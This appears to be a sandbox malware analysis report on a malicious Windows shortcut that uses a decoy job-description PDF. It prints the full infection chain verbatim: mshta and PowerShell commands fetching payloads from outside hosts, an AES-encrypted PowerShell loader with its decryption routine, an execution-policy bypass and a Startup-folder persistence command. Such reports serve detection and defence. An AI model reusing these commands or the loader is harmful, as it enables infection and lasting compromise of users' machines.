Source: powershell.exe, 00000005.00000002.2176390599.0000023772570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghepduy1325;.JSE;.WSF;.WSj
Source: powershell.exe, 00000005.00000002.2174205142.00000237004A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghepduy1325h
Source: powershell.exe, 00000005.00000002.2174205142.0000023700001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/ghepduy1325p
Source: Guard.exe, 0000001C.00000003.2506926999.0000000004A28000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.28.dr, Guard.exe.20.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Guard.exe.20.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 0000001C.00000003.2506926999.0000000004A28000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.28.dr, Guard.exe.20.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BB0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,19_2_00007FF6B5BB0A6C
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BB0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,19_2_00007FF6B5BB0D24
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BB0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,19_2_00007FF6B5BB0A6C
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B97E64 GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,19_2_00007FF6B5B97E64

System Summary

barindex
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: This is a third-party compiled AutoIt script.19_2_00007FF6B5B237B0
Source: dqcwif.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: dqcwif.exe, 00000013.00000000.2367160497.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f2cbdd18-e
Source: dqcwif.exe, 00000013.00000000.2367160497.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_73af01d5-5
Source: dqcwif.exe.9.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2cb54c54-8
Source: dqcwif.exe.9.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_4842f149-6
Source: WMIC.exe, 00000000.00000002.2144657834.000001E99E280000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32\Wbem\wmic.exe"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghepduy1325')"C:\Users\user\Desktop\7A2lfjTYNf.lnkWinsta0\Defaultmemstr_70867194-b
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\dqcwif.exeJump to dropped file
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: 7A2lfjTYNf.lnkLNK file: process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghepduy1325')"
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BA3E20: GetFullPathNameW,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,19_2_00007FF6B5BA3E20
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B8D2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,19_2_00007FF6B5B8D2C4
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B9D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,19_2_00007FF6B5B9D750
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BBF63019_2_00007FF6B5BBF630
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BB56A019_2_00007FF6B5BB56A0
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B595B019_2_00007FF6B5B595B0
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B358D019_2_00007FF6B5B358D0
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B4F8D019_2_00007FF6B5B4F8D0
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B9D87C19_2_00007FF6B5B9D87C
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B2183C19_2_00007FF6B5B2183C
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B6184019_2_00007FF6B5B61840
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BD17C019_2_00007FF6B5BD17C0
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B5175019_2_00007FF6B5B51750
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B6529C19_2_00007FF6B5B6529C
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BB32AC19_2_00007FF6B5BB32AC
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B2B39019_2_00007FF6B5B2B390
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B4BEB419_2_00007FF6B5B4BEB4
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B2BE7019_2_00007FF6B5B2BE70
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B4C13019_2_00007FF6B5B4C130
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BB206C19_2_00007FF6B5BB206C
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B25F3C19_2_00007FF6B5B25F3C
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BCDB1819_2_00007FF6B5BCDB18
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B3FA4F19_2_00007FF6B5B3FA4F
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BCBA0C19_2_00007FF6B5BCBA0C
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BA1A1819_2_00007FF6B5BA1A18
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B2B9F019_2_00007FF6B5B2B9F0
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B5793C19_2_00007FF6B5B5793C
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B33C2019_2_00007FF6B5B33C20
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BCC6D419_2_00007FF6B5BCC6D4
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BCA59C19_2_00007FF6B5BCA59C
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BC055C19_2_00007FF6B5BC055C
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B5A8A019_2_00007FF6B5B5A8A0
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B667F019_2_00007FF6B5B667F0
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BB632019_2_00007FF6B5BB6320
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B402C419_2_00007FF6B5B402C4
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B4451419_2_00007FF6B5B44514
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B584C019_2_00007FF6B5B584C0
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B4C3FC19_2_00007FF6B5B4C3FC
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B6240019_2_00007FF6B5B62400
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BA83D419_2_00007FF6B5BA83D4
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BB836019_2_00007FF6B5BB8360
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B40E9019_2_00007FF6B5B40E90
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BCCE8C19_2_00007FF6B5BCCE8C
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B30E7019_2_00007FF6B5B30E70
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B32E3019_2_00007FF6B5B32E30
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B66DE419_2_00007FF6B5B66DE4
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B530DC19_2_00007FF6B5B530DC
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B22AE019_2_00007FF6B5B22AE0
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BC0AEC19_2_00007FF6B5BC0AEC
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B62D2019_2_00007FF6B5B62D20
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BB6C3419_2_00007FF6B5BB6C34
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD3370397324_2_00007FFD33703973
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: String function: 00007FF6B5B48D58 appears 76 times
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2554
Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2554Jump to behavior
Source: classification engineClassification label: mal100.expl.evad.winLNK@43/61@8/3
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BA3778 GetLastError,FormatMessageW,19_2_00007FF6B5BA3778
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B8D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,19_2_00007FF6B5B8D5CC
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B8CCE0 AdjustTokenPrivileges,CloseHandle,19_2_00007FF6B5B8CCE0
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BA58C4 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,19_2_00007FF6B5BA58C4
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B9BE00 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,19_2_00007FF6B5B9BE00
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BA5F2C CoInitialize,CoCreateInstance,CoUninitialize,19_2_00007FF6B5BA5F2C
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B26580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,19_2_00007FF6B5B26580
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ghepduy1325[1]Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1220:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8752:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8436:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2924:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zd5ndduv.ekm.ps1Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 7A2lfjTYNf.lnkVirustotal: Detection: 25%
Source: 7A2lfjTYNf.lnkReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghepduy1325')"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/ghepduy1325')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghepduy1325"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghepduy1325
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '4734F167E688B712E3D248343D2E8F27F45EFEB66CEF33E5F71E91F4D577D03D307A3816965837CD191787DF5ED88323F20D1C6944C9100F6D044DB74B45638F201D8BAE55A1DE539BF3C012438184FFECF2A18AA75A38B5FA2B30E3775A68700359403C96690A310E0FA61DE6143A7A471CABD4AE708C72CF84B7A1DC559F9DCF0AABDD03FCA45762903F51468BEF8488494E7B7429432A3A1BAEDBF4833DEEA70781E018E4DFB87CD05CEA8267DFEEC57474934D2E72FED942DC3B6E04D01F82804DECEF13DC95D9F76B95330BE652C3F5ECAB21E4D67450285F38D92BE31580C4E736177BF71474B83457639E9C2881131387C24401F97A86AE28EF1CFA3564CF1974B4ACC0F6695257FA23A2DDB11745C35D97B3064A0BAAF7A97272149C51840237CA06689453D6A5F8B46678E8011672959BFCB6DFD142A3ED66ADE572299E442A73D667DF9462BE96290706311211F2CE31646E4040EBF2F7AA2CB9DC7FCF0E3D67762E76457BAA609917136F01E489A97E9A7FB17C6965F15CFF50FF5637D62983F02A4262193FDA98C9A16EF2DA91F27193760578614D5E2613AC07AC1CCB5EF6F587BC781DF31F55B65181C86F562B2BD2A35461CAC5C101B21214506A52C17834FA44C6E0DEF1A1E9CB0715D93135D5BBF09E6FCCE528E1DA3761E0A1F265D5F0FB3FA2E21AC770F6F27CC1EC289352FC35A8C7DE18C442B194FDCFA10DB3DA7CDE32FD8403F449D8FC75BE84A071B70C8F5544157502E7B2071633BA5B9D659AB9028E480647AA8FE41712E40CDB4E6A26F3268BFCF26F9072B471B8C282387E4DBA4EBC93609965409C1A65C0C57DF0CE49EC876F91C5A96386BD60817F78D48A9D0148412611DA9639CF9834309BE5DACA432F3ACBDFA219E5B95B26C009CFC00CF54BE154220779009DDC479CBDFEB32FC40336CC86D179FF44CD5B390F941A50D06D52FAFC8F32DB72C3505502F57C9EAA8B71200A218380D35F04EDC8E95B91FA86829B4510AD91625BBE54DB1D3237B08832E5C8289753B1D32B208E9E6AA7E281982490307DB6935EA25109C185FC165625387C55175929D993B0A9A3B1022C240A5ACB0431E98C81D66C70D1DC29B7F9909E6515937CDB3D283F4B12B4C4D6E3F28F0B7F5FD07BA8EDC2B28158165A3FB91BF281D1C320E33D3C8D25C1ABC674AB74EA1BE51CF9A35EC73C41528008D4E8200333FAB1BFEDC6C324ED62E667038A747AA71059CF2CF52ED74304019637D834465D06062AAA679880D486BEED29E51CBB32E274D08CF418E16AC10216BB620E504A77D4771DF75717D83FEB1DA9EA2224B0AB6051F81C35169397369EDE2B5FCAD429BA6B5E93A03CD2128D91B05F33C31AA36E6F16AFEB422B869409A043987E74028E99F3553B4AC0943C7347DBDB9818608468516E754F4271494E6951625143456D';function yVE ($UZpVPhOy){return -split ($UZpVPhOy -replace '..', '0x$& ')};$foocSK = yVE($ddg.SubString(0, 2016));$vAM = [System.Security.Cryptography.Aes]::Create();$vAM.Key = yVE($ddg.SubString(2016));$vAM.IV = New-Object byte[] 16;$MnEAtBA = $vAM.CreateDecryptor();$QXykJ = [System.String]::new($MnEAtBA.TransformFinalBlock($foocSK, 0,$foocSK.Length)); sal fd $QXykJ.Substring(3,3); fd $QXykJ.Substring(6)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1596,i,13836792171696391892,6566973636645197800,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dqcwif.exe "C:\Users\user\AppData\Roaming\dqcwif.exe"
Source: C:\Users\user\AppData\Roaming\dqcwif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/IAFkh" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\dqcwif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghepduy1325"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/ghepduy1325Jump to behavior
